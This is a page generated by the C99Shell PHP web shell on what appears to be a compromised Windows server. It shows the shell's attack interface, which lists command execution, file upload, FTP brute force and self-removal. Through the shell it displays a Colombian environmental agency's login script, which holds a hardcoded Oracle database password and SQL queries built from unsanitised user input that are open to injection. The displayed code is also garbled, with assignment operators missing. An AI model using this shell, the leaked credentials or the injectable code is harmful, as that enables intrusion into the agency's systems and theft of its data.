!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpscripts\cdr\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     validar.php (8.83 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('conectar.php');
$consul "SELECT *
FROM cdr
WHERE nit ='
$nit' and clave='$clave'";
$result mysql_query($consul,$db);
$num_filas mysql_num_rows($result);

if (
$num_filas == 0) {
    
?>
<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>Formulario de Ingreso de Reportes</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript" type="text/JavaScript">
<!--


function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->
</script>
</head>

<body topmargin="0" link="#F97C00" vlink="#000000">

<table border="0" width="687" bgcolor="#FFFFFF" cellspacing="0" cellpadding="0"
bordercolor="#FFFFFF">
  <tr>
    <td width="100%" colspan="2"><img src="../ince/encabe4.gif" width="744" height="70"
    alt="encabe.gif (14884 bytes)"></td>
  </tr>
  <tr>
    <td width="50%">&nbsp;</td>
    <td width="50%"><p align="right"><a href="http://www.dama.gov.co"><img src="../ince/back.gif"
    width="73" height="16" alt="Regresar al Home..." align="left" border="0"></a></td>
  </tr>
  <tr>
    <td width="100%" colspan="2"><div align="center"><img src="../ince/cdr.gif" width="500" height="69"></div></td>
  </tr>
</table>

<form name="form1" method="post" action="validar.php">
  <p>
  <table border="1" width="687" cellspacing="0" cellpadding="5" bordercolor="#FFFFFF">
    <tr bgcolor="#CC0000">
      <td colspan="3" align="center">
        <div align="left"><font face="Arial Black" color="#FFFFFF">Formato de
          Validaci&oacute;n de Usuarios</font></div></td>
    </tr>
    <tr>
      <td colspan="3" valign="top"><div align="center"><font color="#CC0000" size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Nota:</strong>
          Su Clave, C&oacute;digo del CDR o NIT no correspone a un registro v&aacute;lido,
          por favor intente de nuevo o verifique sus datos en el DAMA.</font></div></td>
    </tr>
    <tr>
      <td valign="top"><div align="right">
          <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> * Clave:</font></p>
        </div></td>
      <td width="33%" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <input name="clave" type="password" id="clave" size="8">
        </font></td>
      <td width="34%" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td valign="top"><div align="right"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">*
          Nit:</font></div></td>
      <td colspan="2" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <input name="nit" type="text" id="nit" size="15">
        </font></td>
    </tr>
    <tr bordercolor="#999999">
      <td height="97" valign="top" bordercolor="#FFFFFF"> <p align="center"><font face="Arial"><small></small></font></td>
      <td height="97" colspan="2" valign="top" bordercolor="#CCCCCC"> <p align="center">
          <input type="submit" name="Submit" value="Validar el acceso...">
        </p>
        <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">* Los campos
          marcados con asterisco son indespensables.</font></p>
        <p><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Todos los
          Derechos Reservados para el DAMA.<br>
          El presente servicio es un producto del Sistema de Informaci&oacute;n
          del DAMA - SIA<br>
          Bogot&aacute;, 2003.</font></p></td>
    </tr>
  </table>
</form>
<p>&nbsp;</p>
</body>
</html>
<?php

    
}else{
$myrow mysql_fetch_array($result);
$codigocdr $myrow["CODCDR"];

$err=0;
$db "sia";
$c1 OciLogon("email","email2003",$db);
$stmt ociparse($c1,"SELECT CODIGO_ORGANIZACION,NOMBRE_ORGANIZACION,NIT,EO_ID,DOBJ_DIRECCION,DIAG_CODIGO_DAMA
FROM SIA_ORGANIZACION
WHERE NIT=
$nit");
$result OCIExecute($stmt);
if (
$result == 0) {
$terr "El Nit de su organización no se encuentra registrado en el SIA-DAMA, por favor contactenos para verificar los datos.";
$err=1;
}else{
while(
OCIFetchInto($stmt$value)) {
$nombreorg $value[1];
$direorg $value[4];
$eoidorg $value[3];
}


}



        
?>
<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>Formulario de Ingreso de Reportes</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript" type="text/JavaScript">
<!--


function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->
</script>
</head>

<body topmargin="0" link="#CC0000" vlink="#CC0000">
<table border="0" width="687" bgcolor="#FFFFFF" cellspacing="0" cellpadding="0"
bordercolor="#FFFFFF">
  <tr>
    <td width="100%" colspan="2"><img src="../ince/encabe4.gif" width="744" height="70"
    alt="encabe.gif (14884 bytes)"></td>
  </tr>
  <tr>
    <td width="50%">&nbsp;</td>
    <td width="50%"><p align="right"><a href="http://www.dama.gov.co"><img src="../ince/back.gif"
    width="73" height="16" alt="Regresar al Home..." align="left" border="0"></a></td>
  </tr>
  <tr>
    <td width="100%" colspan="2"><div align="center"><img src="../ince/cdr.gif" width="500" height="69"></div></td>
  </tr>
</table>

<form action="conectar1.php" method="post" enctype="multipart/form-data" name="form1">
  <p>
  <table border="1" width="687" cellspacing="0" cellpadding="5" bordercolor="#FFFFFF">
    <tr bordercolor="#FFFFFF">
      <td colspan="2" align="center" bgcolor="#CC0000"> <div align="left"><font face="Arial Black" color="#FFFFFF">Seleccione
          la sede de la cual desea enviar la informaci&oacute;n</font></div></td>
    </tr>
    <tr bordercolor="#FFFFFF">
      <td width="33%" valign="top">
        <div align="right"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
          <strong>Nombre Principal de la Organizaci&oacute;n:</strong></font></div></td>
      <td valign="middle"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <?php echo $nombreorg?></font></td>
    </tr>
    <tr bordercolor="#FFFFFF">
      <td valign="top">
        <div align="right">
          <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Direcci&oacute;n
            Sede Principal</strong>:</font></p>
        </div></td>
      <td valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <?php echo $direorg?></font></td>
    </tr>
    <tr bordercolor="#FFFFFF">
      <td height="48" colspan="2" valign="top"> <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><font color="#CC0000">A)
          Envio de Informaci&oacute;n al Sistema de Informaci&oacute;n.</font></strong><br>
          Seleccione del siguiente men&uacute;, la sede de la cual desea enviar
          la informaci&oacute;n, una vez seleccionada, haga clic en continuar.</font></p>
      </td>
    </tr>
    <tr bordercolor="#FFFFFF">
      <td height="48" colspan="2" valign="top"> <p align="center">
          <select name="eoidorg" id="sede">
         <?php
            
echo "<option value=\"$eoidorg\">$direorg</option>\n";
$stmt ociparse($c1,"SELECT CODIGO_SEDE,NOMBRE_SEDE,DIRECCION,EO_ID
FROM SIA_SEDE
WHERE EO_PADRE_ID=
$eoidorg");
$result OCIExecute($stmt);
if (
$result == 0) {
}else{
while(
OCIFetchInto($stmt$value)) {
$nombres $value[1];
$dires $value[2];
$eoids $value[3];
echo 
"<option value=\"$eoids\">$dires</option>\n";
}


}
            
?>
          </select>
          <input type="hidden" name="nombreorg" value="<?php echo $nombreorg?>">
           <input type="hidden" name="codcdr" value="<?php echo $codigocdr?>">
                <input type="hidden" name="direorg" value="<?php echo $direorg?>">
          <font color="#FFFFFF">aa
          <input type="submit" name="Submit" value="Continuar">
          </font>
        </td>
    </tr>
    <tr bordercolor="#FFFFFF">
      <td height="31" colspan="2" valign="top" bgcolor="#CC0000">&nbsp;</td>
    </tr>
    <tr bordercolor="#FFFFFF">
      <td height="49" valign="top"> <div align="center"><font face="Arial"><small><small><img
    src="../ince/logalc.gif" width="80" height="85" alt="logalc.gif (3822 bytes)"></small></small></font></div></td>
      <td height="49" valign="middle"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Centro
        de Estudios e Investigaciones Ambientales, CEIAM, UIS.<br>
        Todos los Derechos Reservados para el DAMA.<br>
        El presente servicio es un producto del Sistema de Informaci&oacute;n
        del DAMA - SIA<br>
        Bogot&aacute;, 2003.</font></td>
    </tr>
  </table>
</form>
<p>&nbsp;</p>
</body>
</html>

        
        

<?php



    
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--